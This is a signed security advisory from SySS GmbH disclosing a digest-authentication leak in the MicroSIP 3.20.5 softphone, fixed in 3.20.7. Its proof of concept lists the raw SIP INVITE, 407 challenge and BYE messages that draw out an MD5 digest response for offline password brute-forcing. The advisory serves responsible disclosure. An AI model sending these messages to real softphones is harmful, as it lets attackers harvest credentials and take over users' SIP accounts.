-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Advisory ID: SYSS-2021-019
Product: MicroSIP
Manufacturer: MicroSIP
Affected Version(s): MicroSIP/3.20.5     
Tested Version(s): MicroSIP/3.20.5
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2021-04-08
Solution Date: 2021-08-25
Public Disclosure: 2021-10-13
CVE Reference: -
Authors of Advisory: Moritz Abrell

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

"MicroSIP [1] is an open source portable SIP softphone based on PJSIP stack 
for Windows OS.
It allowing to do high quality VoIP calls (person-to-person or on regular 
telephones) via open SIP protocol. From cloud of SIP providers you can 
choose best for you, register account and use it with MicroSIP. You'll 
get free person-to-person calls and cheap international calls."

The MicroSIP Softphone is vulnerable to SIP Digest-Authenticaton leakage, 
resulting in leaking data which can be used to brute force login 
credentials for the extension of the MicroSIP SIP account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

If a SIP INVITE request is sent to the SIP service of the MicroSIP, the
softphone is ringing and signaling an incoming call. If the user is 
accepting the call and hanging up later, the softphone sends a
SIP BYE request to the caller. The caller is now able to respond with 
a 407 "Proxy Authentication Required" message within authentication 
parameters, such as realm and nonce value. After that the softphone 
sends a new SIP BYE request within a complete digest authentication 
response. 

This response includes all required parameters to performing an offline
password brute-force attack against the MicroSIP SIP account credentials.

For a successful attack, the SIP port (default UDP and TCP 5060) of the 
softphone must be accessible via network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Sending a SIP INVITE request to the MicroSIP:
    INVITE sip:100@192.168.122.168:5060 SIP/2.0
    Via: SIP/2.0/UDP 192.168.122.1:5060;branch=z9hG4bK-18567-1-0
    From: <sip:101@192.168.122.1:5060>;tag=1
    To: <sip:100@192.168.122.168:5060>
    Call-ID: 1-18567@192.168.122.1
    CSeq: 1 INVITE
    Contact: sip:101@192.168.122.1:5060
    Max-Forwards: 70
    Subject: Performance Test
    Content-Type: application/sdp
    Content-Length: 137
    
    v=0
    o=user1 53655765 2353687637 IN IP4 192.168.122.1
    s=-
    c=IN IP4 192.168.122.1
    t=0 0
    m=audio 6000 RTP/AVP 8
    a=rtpmap:8 PCMA/8000

2. The Softphone is ringing and signals an incoming call. 

3. The user accepts the call and hangs up, because of no audio.

4. The Softphone sends a BYE request to the attacker:
    BYE sip:sipp@192.168.122.1:5060 SIP/2.0
    Via: SIP/2.0/UDP 192.168.122.168:64688;rport;branch=z9hG4bKPj2499b1d
    Max-Forwards: 70
    From: <sip:100@192.168.122.168>;tag=c1a67859ed404cb48f47d2779a038937
    To: <sip:101@192.168.122.1>;tag=1
    Call-ID: 1-18567@192.168.122.1
    CSeq: 19072 BYE
    User-Agent: MicroSIP/3.20.5
    Content-Length: 0

5. Sending a 407 "Proxy Authentication Required" response with realm
 and a nonce value:
    SIP/2.0 407 Proxy Authentication Required
    Via: SIP/2.0/UDP 192.168.122.168:64688;rport;branch=z9hG4bKPj2499b1d
    From: <sip:100@192.168.122.168>;tag=c1a67859ed404cb48f47d2779a038937
    To: <sip:101@192.168.122.1>;tag=1
    Call-ID: 1-18567@192.168.122.1
    CSeq: 19072 BYE
    WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="69d327e5"
    Content-Length: 0

6. MicroSIP sends a second BYE request within an "Authorization" header:
    BYE sip:101@192.168.122.1:5060 SIP/2.0
    Via: SIP/2.0/UDP 192.168.122.168:64688;rport;branch=z9hG4bKPj2499b1d
    Max-Forwards: 70
    From: <sip:100@192.168.122.168>;tag=c1a67859ed404cb48f47d2779a038937
    To: <sip:101@192.168.122.1>;tag=1
    Call-ID: 1-18567@192.168.122.1
    CSeq: 19073 BYE
    User-Agent: MicroSIP/3.20.5
    Authorization: Digest username="100", realm="asterisk", 
        nonce="69d327e5", uri="sip:101@192.168.122.1:5060", 
        response="fd1b84475d183409b288e76d07682a06", algorithm=MD5
    Content-Length:  0

The attacker is now able to perform an offline password brute-force
attack against the SIP account of MicroSIP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution: 

A fix is provided by the manufacturer in MicroSIP version 3.20.7,
available at MicroSIP download site [3]. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-04-08: Vulnerability reported to manufacturer
2021-04-13: Confirmation and information recieved about a planned solution 
            in the next release from the manufacturer.
2021-05-25: Security patch provided by the manufacturer, but the vulnerability 
            still exists.
2021-08-25: Fix of the vulnerability provided by the manufacturer in 
            version 3.20.7.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1]: Product website for MicroSIP:
    https://www.microsip.org/

[2]: SySS Responsible Disclosure Policy:
    https://www.syss.de/en/news/responsible-disclosure-policy/

[3]: Download Site of MicroSIP:
    https://www.microsip.org/downloads

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmFlm88ACgkQrgyb+PE0
i1PSEQ//f+yl+9tA6hTZxWx4sA7qoumEmEALC/TdXJw40hUcp/TMByaoEy3FOP2c
76qPUkyQ2fEmiiXC1L9/Pyr3fbr1rqjKPdUWLRbcW7lgEhAsyEBB/bLgdd5nLmH9
rm2ItYOeMYdY4cey+ccb7xjZzVMoHsytZZXCbsyNm6PcPohkkvBYlaOhQlgt8czg
B5QMTg0LZAE9nGuO3vnytW0e5rMKigu0Ndme8qxHD3uvxJH1gF2RndgTlJCa720j
zVz/0ApfBlXZpaSadtsP3fR/C/X5z+yPBC3Q8U3dHBd6BVoEk43JnkF89N3sE7J9
9sM7REnkdEH2lSimCAOeP4dStZlzYG47M1DicOXML9vBbgo4fOBEAHKJBAUK2Pes
lm/A0xtQ85DVfiUhJRYywYlHenKR3PpAQF4QqjSVVVumJxZyIrsUq7psKkR3lOZF
C7y8MDosJG7LGtmGS01n6n+FcXY6Kb2S0CespCq+GreGWTBs9YvO4OhWzgIFm4La
WUiMDiQyjjmb7iTUJW+4q1xYMkdeoEtcvDc1YltQS8rAb12ztWUL2cBUOTnhsf9g
IycMJ+fx+B1C91DRqIAIZ4nMRmAJBPgvygAF6yB8I04Q6kvLScJF/1Zk/Kp3HeG2
WJYFpuAhSTq1LG0u9gsLngtDIWaHN+wU9VEq/AJHf2ZCIAD6zPk=
=bkeK
-----END PGP SIGNATURE-----